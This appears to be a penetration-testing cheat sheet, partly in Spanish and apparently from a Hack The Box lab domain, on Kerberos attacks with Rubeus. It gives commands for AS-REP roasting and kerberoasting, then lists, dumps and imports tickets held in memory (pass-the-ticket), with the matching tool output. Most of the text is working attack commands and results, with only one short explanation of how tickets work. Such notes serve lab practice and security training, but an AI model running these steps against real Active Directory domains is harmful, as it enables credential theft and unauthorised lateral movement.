Kerberos
Kerberos (AS-REP)
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrapKerberos (SPN)
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrapKerberos Tickets
Los Kerberos tickets son credenciales digitales utilizadas para autenticar usuarios en una red. En lugar de enviar contraseñas, el sistema de Kerberos emite un TGT (Ticket Granting Ticket) cuando un usuario se autentica. Este TGT le permite obtener service tickets para acceder a recursos específicos sin tener que introducir su contraseña nuevamente. Cada ticket tiene una duración limitada para mejorar la seguridad.
Extract Kerberos Ticket
Es posible extraer ticket de kerberos directamente de la memoria si algun ticket existe. Podemos utilizar Rubeus para realizarlo.
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triageAction: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x56a09
-----------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------
| 0xa901f | DC01$ @ PAY.HTB | krbtgt/PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x11725b | DC01$ @ PAY.HTB | ldap/DC01.PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x56a09 | sqlsvc @ PAY.HTB | krbtgt/pay.htb | 2/27/2025 5:19:27 PM |
-----------------------------------------------------------------------------------Extraer kerberos ticket.
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /service:krbtgt /luid:0x56a09 /nowrap[*] Target service : krbtgt
[*] Target LUID : 0x56a09
[*] Current LUID : 0x56a09
UserName : Administrator
Domain : PAY
LogonId : 0x56a09
UserSID : S-1-5-21-2839822896-2191592306-2017040813-500
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/27/2025 1:16:16 AM
LogonServer : DC01
LogonServerDNSDomain : PAY.HTB
UserPrincipalName : Administrator@PAY.HTB
ServiceName : krbtgt/pay.htb
ServiceRealm : PAY.HTB
UserName : sqlsvc (NT_PRINCIPAL)
UserRealm : PAY.HTB
StartTime : 2/27/2025 7:19:27 AM
EndTime : 2/27/2025 5:19:27 PM
RenewTill : 3/6/2025 7:19:27 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : p+00GKftjtwU74EZQtMW3g==
Base64EncodedTicket :
doIFODCCBTSgAwIBBaEDAgEWooIEXjCCBFphggRW...........Creamos un proceso nuevo de tipo logon session (9).
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : False
[*] Username : KG7VU7UW
[*] Domain : PB2T3FGC
[*] Password : GTHOXJHA
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2328
[+] LUID : 0x86bcffPodemos importar en ticket en el nuevo proceso creado.
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /service:0x86bcff /ticket:doIFODCCBTSgAwIBBaEDAg......[*] Action: Import Ticket
[+] Ticket successfully imported!